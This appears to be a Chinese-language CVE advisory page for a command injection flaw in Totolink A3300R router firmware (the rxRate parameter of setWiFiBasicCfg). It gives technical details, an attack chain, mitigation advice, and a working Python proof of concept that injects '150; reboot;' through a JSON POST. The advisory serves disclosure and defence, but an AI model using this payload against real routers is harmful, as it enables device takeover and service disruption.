CVE-2026-5177 CVSS 6.3 中危

CVE-2026-5177 Totolink A3300R命令注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5177

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink A3300R

漏洞概述

Totolink A3300R路由器固件版本17.0.0cu.557_b20221024中存在命令注入漏洞。漏洞位于/cgi-bin/cstecgi.cgi文件的setWiFiBasicCfg函数，因未对rxRate参数进行严格过滤导致。攻击者可远程发送特制数据包，利用该漏洞在系统后台执行任意命令。此漏洞利用门槛较低，无需用户交互即可触发，成功利用可能导致设备被接管、数据泄露或服务中断。鉴于漏洞利用代码已公开，风险显著增加，用户应立即采取防护措施。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）。Totolink A3300R的Web管理接口通过CGI程序 /cgi-bin/cstecgi.cgi 处理配置请求。在调用 setWiFiBasicCfg 函数设置WiFi参数时，后端程序直接将用户提交的 rxRate 参数拼接到系统命令字符串中执行，缺乏必要的输入验证和特殊字符过滤。攻击者可以利用Shell元字符（如 ;、|、&& 或 `）切断原有命令逻辑并拼接任意恶意指令。由于该CGI接口通常运行在较高权限下，且攻击无需复杂交互，远程攻击者只需发送构造好的HTTP POST请求即可触发漏洞。成功利用后，攻击者可在目标设备上执行任意系统命令，进而获取设备控制权、窃取配置信息或植入持久化后门。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别暴露的Totolink A3300R设备及其固件版本。

STEP 2

构造载荷

攻击者利用Shell元字符构造包含恶意命令的rxRate参数值。

STEP 3

发送请求

攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送包含恶意JSON数据的POST请求。

STEP 4

命令执行

CGI程序解析请求，将未经过滤的参数拼接到系统命令中执行，触发恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable device
target_url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

# Headers to mimic a legitimate browser request
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json",
    "Accept": "application/json"
}

# Vulnerable payload in the 'rxRate' parameter
# Using a semicolon to chain a simple command (e.g., reboot or ping)
payload_data = {
    "topicurl": "setWiFiBasicCfg",
    "rxRate": "150; reboot;"
}

try:
    # Sending the POST request to trigger the vulnerability
    response = requests.post(target_url, json=payload_data, headers=headers, timeout=5)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to send payload. Status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink A3300R 17.0.0cu.557_b20221024

防御指南

临时缓解措施

建议用户立即访问Totolink官方网站下载并安装最新版本固件，修补已知的命令注入漏洞。在升级完成前，应禁用路由器的远程管理功能，确保仅信任的内网设备可以访问管理后台，并修改默认的管理员账户密码以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5177
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5177
3 Details https://www.cvedetails.com/cve/CVE-2026-5177/
4 VulDB https://vuldb.com/cve/CVE-2026-5177
5 Link https://github.com/LvHongW/Vuln-of-totolink_A3300R/tree/main/A3300R_rxRate_cmd_inject
6 Link https://vuldb.com/submit/779146
7 Link https://vuldb.com/vuln/354245
8 Link https://vuldb.com/vuln/354245/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表